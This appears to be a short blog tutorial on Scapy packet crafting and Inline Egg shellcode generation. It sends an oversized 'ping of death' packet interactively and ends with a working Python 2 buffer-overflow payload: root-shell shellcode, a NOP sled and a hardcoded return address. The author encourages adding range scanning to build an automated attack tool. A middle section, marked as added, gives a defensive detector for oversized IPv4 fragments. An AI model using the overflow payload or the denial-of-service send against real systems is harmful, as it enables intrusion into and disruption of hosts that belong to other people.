Between Scapy and Inline Egg, scripting network probes and [remote] buffer overflows has gotten much simpler. Scapy allows you to interactively craft packets and send/receive them; once you've debugged the packet construction, you can drop it into a Python script for re-use. Inline Egg takes care of crafting null-free opcode sequences (shellcode) for hijacking running processes.

Scapy comes with a slew of protocols and handy tools like traceroute, arpcachepoison, p0f, etc. Here's an example of interactively crafting some pings (a normal echo request, then an oversized "ping of death"):

# normal ping
>>> ip = IP(dst="192.168.1.1")
>>> pkt = ip/ICMP()/"0xDECAFBAD"
>>> ans,unans = sr( pkt )
Begin emission:
.Finished to send 1 packets.
*
Received 2 packets, got 1 answers, remaining 0 packets
>>> ans.hexraw()
0000 08:11:27.604624 IP / ICMP 192.168.1.50 > 192.168.1.1 echo-request 0 / Raw ==> IP / ICMP 192.168.1.1 > 192.168.1.50 echo-reply 0 / Raw / Padding
0000  30 78 44 45 43 41 46 42 41 44                    0xDECAFBAD

# ping of death
>>> pkt = ip / ICMP() / "0xDECAFBAD"*6551
>>> ans,drops = sr( pkt )
..Begin emission:
............................
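A defender-side counterpart to the ping-of-death send, as an added example that is not from the original post: a pure-Python check, with no Scapy dependency, that parses IPv4 fragment headers and flags any fragment whose data would push the reassembled datagram past the 65535-byte limit, which is what the 65538-byte echo request (20 + 8 + 10*6551 bytes) becomes once a host tries to reassemble it. The frames it runs over are constructed inline to mirror the two packets in the session; the helper and field names are my own.

```python
import struct

IPV4_MIN_HDR = 20
IPV4_MAX_LEN = 65535   # the IPv4 total-length field is 16 bits wide
MTU_PAYLOAD = 1480     # 1500-byte Ethernet MTU minus a 20-byte IP header

def parse_ipv4(frame):
    """Return the IPv4 header fields a fragment-size check needs (checksum ignored)."""
    if len(frame) < IPV4_MIN_HDR:
        raise ValueError("truncated IPv4 header")
    ver_ihl, _tos, total_len, ident, flags_frag, _ttl, proto = struct.unpack("!BBHHHBB", frame[:10])
    ihl = (ver_ihl & 0x0F) * 4
    return {
        "id": ident,
        "proto": proto,
        "mf": bool(flags_frag & 0x2000),            # "more fragments" flag
        "offset": (flags_frag & 0x1FFF) * 8,        # offset field counts 8-byte units
        "payload_len": total_len - ihl,
    }

def reassembled_length(pkt):
    """Size the datagram would reach once this fragment's data sits at its offset."""
    return IPV4_MIN_HDR + pkt["offset"] + pkt["payload_len"]

def find_oversized(frames):
    """Flag every fragment whose data would push reassembly past 65535 bytes."""
    alerts = []
    for frame in frames:
        pkt = parse_ipv4(frame)
        size = reassembled_length(pkt)
        if size > IPV4_MAX_LEN:
            alerts.append((pkt["id"], pkt["offset"], size))
    return alerts

def make_fragment(ident, offset, more, payload_len, proto=1):
    """Constructed sample frame: minimal IPv4 header plus filler, checksum left zero."""
    flags_frag = (0x2000 if more else 0) | (offset // 8)
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, IPV4_MIN_HDR + payload_len, ident,
                      flags_frag, 64, proto, 0, bytes([192, 168, 1, 50]), bytes([192, 168, 1, 1]))
    return hdr + b"\x00" * payload_len

# Constructed traffic mirroring the two sends in the session above: the normal echo
# request (8-byte ICMP header + 10-byte "0xDECAFBAD") and the 65538-byte one, split
# the way a 1500-byte link would fragment it.
NORMAL_PING = [make_fragment(1, 0, False, 8 + 10)]
POD_DATA = 8 + 10 * 6551                          # 65518 bytes of ICMP data
POD_PING = [make_fragment(2, off, off + MTU_PAYLOAD < POD_DATA, min(MTU_PAYLOAD, POD_DATA - off))
            for off in range(0, POD_DATA, MTU_PAYLOAD)]
```

Only the final fragment trips the check: every earlier one lands below the limit, so a detector that looks at single fragments without summing offset and length misses this entirely.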

Inline Egg has a lot of power; check out the basic shellcode creation below. Parametrize this, add some range scanning, and you have a very usable automated tool.

# Python 2 (Inline Egg is a Python 2 library).
import inlineegg.inlineegg as ie
import struct
import sys

def stdinShellEgg():
    # Target syscall convention; swap for FreeBSDx86Syscall or OpenBSDx86Syscall as needed.
    egg = ie.InlineEgg(ie.Linuxx86Syscall)
    egg.setuid(0)
    egg.setgid(0)
    # argv must be a tuple: ('sh') is just the string 'sh', which Inline Egg would
    # iterate character by character, so the trailing comma is required.
    egg.execve('/bin/sh', ('sh',))
    return egg

def main():
    # create egg
    egg = stdinShellEgg()
    # exploit: NOP sled padded to 1024 bytes, then the egg, then the return address repeated
    retAddr = struct.pack('<L', 0xbffffc24)
    toSend = "\x90" * (1024 - len(egg))
    toSend += egg.getCode()
    toSend += retAddr * 20
    # write() instead of print so no trailing newline is appended to the payload
    sys.stdout.write(toSend)

if __name__ == '__main__':
    main()